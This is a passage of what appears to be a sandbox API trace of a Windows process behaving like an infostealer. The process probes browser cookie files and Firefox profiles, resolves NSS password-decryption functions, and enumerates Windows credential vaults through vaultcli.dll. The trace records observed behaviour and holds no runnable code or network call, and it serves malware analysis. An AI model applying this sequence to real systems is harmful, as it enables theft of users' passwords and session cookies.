(hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.842] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge Beta\\User Data\\Default\\Cookies") returned 0 [0180.842] GetProcessHeap () returned 0x5f0000 [0180.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.843] GetProcessHeap () returned 0x5f0000 [0180.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618a10 | out: hHeap=0x5f0000) returned 1 [0180.843] GetProcessHeap () returned 0x5f0000 [0180.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.843] GetProcessHeap () returned 0x5f0000 [0180.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x6247e0 [0180.843] GetProcessHeap () returned 0x5f0000 [0180.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615ca0 [0180.843] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentDirectoryA") returned 0x7ffb26258eb0 [0180.843] GetProcessHeap () returned 0x5f0000 [0180.843] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.843] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x6247e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0180.843] GetProcessHeap () returned 0x5f0000 [0180.843] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.843] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0180.843] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Clients\\StartMenuInternet", ulOptions=0x0, samDesired=0x20019, phkResult=0x5cfd48 | out: phkResult=0x5cfd48*=0x214) returned 0x0 [0180.844] GetProcessHeap () returned 0x5f0000 [0180.844] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.844] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyExA") returned 0x7ffb28a524d0 [0180.844] RegEnumKeyExA (in: hKey=0x214, dwIndex=0x0, lpName=0x5cf900, lpcchName=0x5cfd38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x5cf898 | out: lpName="IEXPLORE.EXE", lpcchName=0x5cfd38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x5cf898) returned 0x0 [0180.844] GetProcessHeap () returned 0x5f0000 [0180.844] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f350 [0180.844] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0180.844] StrStrIA (lpFirst="IEXPLORE.EXE", lpSrch="firefox") returned 0x0 [0180.844] GetProcessHeap () returned 0x5f0000 [0180.844] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.844] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyExA") returned 0x7ffb28a524d0 [0180.844] RegEnumKeyExA (in: hKey=0x214, dwIndex=0x1, lpName=0x5cf900, lpcchName=0x5cfd38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x5cf898 | out: lpName="IEXPLORE.EXE", lpcchName=0x5cfd38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x5cf898) returned 0x103 [0180.847] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0180.847] RegQueryValueExA (in: hKey=0x214, lpValueName=0x0, lpReserved=0x0, lpType=0x5cfd40, lpData=0x1800b7ea0, lpcbData=0x5cfd30*=0x104 | out: lpType=0x5cfd40*=0x1, lpData="IEXPLORE.EXE", lpcbData=0x5cfd30*=0xd) returned 0x0 [0180.847] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0180.847] RegCloseKey (hKey=0x214) returned 0x0 [0180.847] GetProcessHeap () returned 0x5f0000 [0180.847] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615f60 [0180.847] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetCurrentDirectoryA") returned 0x7ffb262768d0 [0180.847] GetProcessHeap () returned 0x5f0000 [0180.848] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.848] SetCurrentDirectoryA (lpPathName="") returned 0 [0180.848] GetProcessHeap () returned 0x5f0000 [0180.849] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f350 [0180.849] LoadLibraryA (lpLibFileName="nss3.dll") returned 0x0 [0180.850] GetProcessHeap () returned 0x5f0000 [0180.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.850] GetProcessHeap () returned 0x5f0000 [0180.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f350 [0180.850] GetProcAddress (hModule=0x0, lpProcName="NSS_Init") returned 0x0 [0180.850] GetProcessHeap () returned 0x5f0000 [0180.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.850] GetProcessHeap () returned 0x5f0000 [0180.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f350 [0180.850] GetProcAddress (hModule=0x0, lpProcName="NSS_Shutdown") returned 0x0 [0180.850] GetProcessHeap () returned 0x5f0000 [0180.850] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.850] GetProcessHeap () returned 0x5f0000 [0180.850] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0180.851] GetProcAddress (hModule=0x0, lpProcName="PK11_GetInternalKeySlot") returned 0x0 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f3c0 [0180.851] GetProcAddress (hModule=0x0, lpProcName="PK11_NeedLogin") returned 0x0 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x615ea0 [0180.851] GetProcAddress (hModule=0x0, lpProcName="PK11_GetTokenName") returned 0x0 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x615dc0 [0180.851] GetProcAddress (hModule=0x0, lpProcName="PK11_Authenticate") returned 0x0 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x615ea0 [0180.851] GetProcAddress (hModule=0x0, lpProcName="PK11_CheckUserPassword") returned 0x0 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.851] GetProcessHeap () returned 0x5f0000 [0180.851] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x61f350 [0180.852] GetProcAddress (hModule=0x0, lpProcName="PK11SDR_Decrypt") returned 0x0 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f350 [0180.852] GetProcAddress (hModule=0x0, lpProcName="PK11_FreeSlot") returned 0x0 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.852] lstrlenA (lpString=0x0) returned 0 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f350 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.852] lstrlenA (lpString=0x0) returned 0 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f350 [0180.852] GetProcessHeap () returned 0x5f0000 [0180.852] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0180.852] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetKnownFolderPath") returned 0x7ffb268804c0 [0180.852] SHGetKnownFolderPath (in: rfid=0x180099560, param_2=0x0, hToken=0x0, ppszPath=0x5cf980 | out: ppszPath=0x5cf980*="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0180.853] GetProcessHeap () returned 0x5f0000 [0180.853] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f630 [0180.853] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 37 [0180.853] GetProcessHeap () returned 0x5f0000 [0180.853] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615f60 [0180.853] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.853] GetProcessHeap () returned 0x5f0000 [0180.853] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0180.854] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f560 [0180.854] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0180.854] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f630, Size=0x26) returned 0x613320 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615f60 [0180.854] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", cchWideChar=37, lpMultiByteStr=0x613320, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 37 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x26) returned 0x613440 [0180.854] GetProcessHeap () returned 0x5f0000 [0180.854] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.854] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="CoTaskMemFree") returned 0x7ffb27e7d2c0 [0180.855] CoTaskMemFree (pv=0x620410) [0180.855] GetProcessHeap () returned 0x5f0000 [0180.855] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3c0, Size=0x26) returned 0x613320 [0180.855] GetProcessHeap () returned 0x5f0000 [0180.855] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.855] GetProcessHeap () returned 0x5f0000 [0180.855] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f3c0 [0180.855] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindFirstFileA") returned 0x7ffb2625d940 [0180.855] GetProcessHeap () returned 0x5f0000 [0180.855] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.855] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x5cfbb0 | out: lpFindFileData=0x5cfbb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x5cfd10, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0180.856] lstrlenA (lpString="") returned 0 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0180.856] lstrcpyA (in: lpString1=0x61f3c0, lpString2="" | out: lpString1="") returned="" [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615ce0 [0180.856] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetCurrentDirectoryA") returned 0x7ffb262768d0 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x5f0000) returned 1 [0180.856] SetCurrentDirectoryA (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x105) returned 0x6249c0 [0180.856] GetProcessHeap () returned 0x5f0000 [0180.856] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f350 [0180.859] GetProcessHeap () returned 0x5f0000 [0180.859] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f3c0 [0180.859] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetVersionExA") returned 0x7ffb26257450 [0180.859] GetProcessHeap () returned 0x5f0000 [0180.859] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.859] GetVersionExA (in: lpVersionInformation=0x5cf970*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x746f6c53, dwMinorVersion=0x80080000, dwBuildNumber=0x1, dwPlatformId=0x620410, szCSDVersion="") | out: lpVersionInformation=0x5cf970*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0180.859] GetProcessHeap () returned 0x5f0000 [0180.859] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f3c0 [0180.859] GetProcessHeap () returned 0x5f0000 [0180.859] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f650 [0180.859] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0180.859] GetProcessHeap () returned 0x5f0000 [0180.859] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f650 | out: hHeap=0x5f0000) returned 1 [0180.859] StrToInt64ExA (in: pszString="0x3CCD5499", dwFlags=0x1, pllRet=0x5ce7b8 | out: pllRet=0x5ce7b8) returned 1 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7) returned 0x61f3c0 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5e0 [0180.860] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToIntExA") returned 0x7ffb262f5d10 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5e0 | out: hHeap=0x5f0000) returned 1 [0180.860] StrToIntExA (in: pszString="0x87A8", dwFlags=0x1, piRet=0x5ce7a0 | out: piRet=0x5ce7a0) returned 1 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7) returned 0x61f3c0 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f480 [0180.860] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToIntExA") returned 0x7ffb262f5d10 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0180.860] StrToIntExA (in: pszString="0x4B10", dwFlags=0x1, piRet=0x5ce7a0 | out: piRet=0x5ce7a0) returned 1 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0180.860] GetProcessHeap () returned 0x5f0000 [0180.860] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f3c0 [0180.860] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x7ffb10dc0000 [0181.286] GetProcessHeap () returned 0x5f0000 [0181.286] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.286] GetProcessHeap () returned 0x5f0000 [0181.286] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x615f60 [0181.286] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultEnumerateItems") returned 0x7ffb10dd0030 [0181.286] GetProcessHeap () returned 0x5f0000 [0181.286] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0181.286] GetProcessHeap () returned 0x5f0000 [0181.286] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x615f60 [0181.287] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultEnumerateVaults") returned 0x7ffb10dda9a0 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f3c0 [0181.287] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultFree") returned 0x7ffb10dd0ca0 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f3c0 [0181.287] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultGetItem") returned 0x7ffb10dd03d0 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f3c0 [0181.287] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultGetItem") returned 0x7ffb10dd03d0 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.287] GetProcessHeap () returned 0x5f0000 [0181.287] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f3c0 [0181.288] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultOpenVault") returned 0x7ffb10dd04e0 [0181.288] GetProcessHeap () returned 0x5f0000 [0181.288] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.288] GetProcessHeap () returned 0x5f0000 [0181.288] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x61f3c0 [0181.288] GetProcAddress (hModule=0x7ffb10dc0000, lpProcName="VaultCloseVault") returned 0x7ffb10dd0580 [0181.288] GetProcessHeap () returned 0x5f0000 [0181.288] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.288] GetProcessHeap () returned 0x5f0000 [0181.288] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f3c0 [0181.288] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetVersionExA") returned 0x7ffb26257450 [0181.288] GetProcessHeap () returned 0x5f0000 [0181.288] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.288] GetVersionExA (in: lpVersionInformation=0x5ce6f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xd, dwMinorVersion=0x615f60, dwBuildNumber=0x0, dwPlatformId=0x13, szCSDVersion="\x14") | out: lpVersionInformation=0x5ce6f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0181.288] VaultEnumerateVaults () returned 0x0 [0181.292] VaultOpenVault () returned 0x0 [0181.292] VaultEnumerateItems () returned 0x0 [0181.293] VaultCloseVault () returned 0x6 [0181.300] VaultOpenVault () returned 0x0 [0181.301] VaultEnumerateItems () returned 0x0 [0181.309] VaultCloseVault () returned 0x6 [0181.310] lstrlenA (lpString=" ") returned 1 [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f3c0 [0181.310] lstrcpyA (in: lpString1=0x61f3c0, lpString2=" " | out: lpString1=" ") returned=" " [0181.310] lstrlenA (lpString="IE") returned 2 [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f530 [0181.310] lstrcpyA (in: lpString1=0x61f530, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f620 [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f620, Size=0x7) returned 0x61f600 [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x61f670 [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f670, Size=0x19) returned 0x636140 [0181.310] GetProcessHeap () returned 0x5f0000 [0181.310] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f480 [0181.314] GetProcessHeap () returned 0x5f0000 [0181.314] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.314] GetProcessHeap () returned 0x5f0000 [0181.314] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636140 | out: hHeap=0x5f0000) returned 1 [0181.314] GetProcessHeap () returned 0x5f0000 [0181.314] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.314] GetProcessHeap () returned 0x5f0000 [0181.314] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.315] GetProcessHeap () returned 0x5f0000 [0181.315] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.315] GetProcessHeap () returned 0x5f0000 [0181.315] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f350 | out: hHeap=0x5f0000) returned 1 [0181.315] lstrlenA (lpString=0x0) returned 0 [0181.315] GetProcessHeap () returned 0x5f0000 [0181.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0181.315] GetProcessHeap () returned 0x5f0000 [0181.315] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.315] GetProcessHeap () returned 0x5f0000 [0181.315] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x636380 [0181.315] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0181.315] GetProcessHeap () returned 0x5f0000 [0181.315] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636380 | out: hHeap=0x5f0000) returned 1 [0181.315] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfa90, csidl=33, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 1 [0181.319] 